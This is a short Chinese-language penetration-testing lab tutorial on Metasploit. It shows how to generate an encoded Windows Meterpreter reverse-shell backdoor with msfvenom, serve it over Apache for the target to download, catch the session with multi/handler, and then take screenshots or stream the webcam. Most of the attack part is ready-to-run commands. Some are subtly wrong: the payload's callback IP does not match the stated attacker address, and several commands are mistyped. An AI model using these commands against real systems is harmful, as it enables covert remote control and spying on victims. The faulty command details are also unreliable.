Metasploit是一款用于漏洞开发和渗透测试的开源工具。Metasploit具有一个庞大的漏洞数据库,其中包含各种操作系统和软件应用程序的已知漏洞。Metasploit框架提供了一个全面的工具集,包括扫描器、利用工具、Payload生成器等,使安全专业人员能够模拟攻击并评估目标系统的安全性。它还包含了一个强大的脚本语言,允许用户编写自定义模块以满足特定需求。
MSF(全名msfconsole)是Metasploit的一个模块,可以执行扫描、利用漏洞、生成Payload以及执行各种其他操作来评估和测试目标系统的安全性。该工具是kali系统自带的
本次实验中的靶机需要关闭防火墙和病毒防护
靶机IP:192.168.37.147
攻击机(kali)IP:192.168.37.144
进入root模式,输入指令:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.60.128 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe - o /var/www/html/vip.exe
-b 去掉坏字符
x代表16进制
00 代表空字符
-e 指定编码器
-i 编码次数
-f 文件类型
-o 指定输出位置和文件名
执行后可在该位置生成一个后门程序,接下来进入MSF设置payload。
msfconsole可直接进入,msfdu run开启数据库并进入
使用监听模块
use exploit/multi/handler
设置payload
set payload windows/meterpreter/reverse_tcp
设置攻击机的IP
set lhost 192.168.37.144
查看还有哪里没有设置
设置完毕,最后执行run
这样就算成功,接下来只需让靶机运行该后门程序,给kali开启apache,可以让靶机直接下载生成的程序
sudo service apache2 start
在靶机打开浏览器,kali IP/文件名
回车后自动下载(需要关闭防火墙保护)
只要靶机运行该文件,kali上就可以开始监听
可以执行一些命令
获取截图
screenshot
打开靶机摄像头
webcam_strea
由于这里的靶机是虚拟机,没有摄像头,就不做演示了,还可以执行很多命令,可以用help查看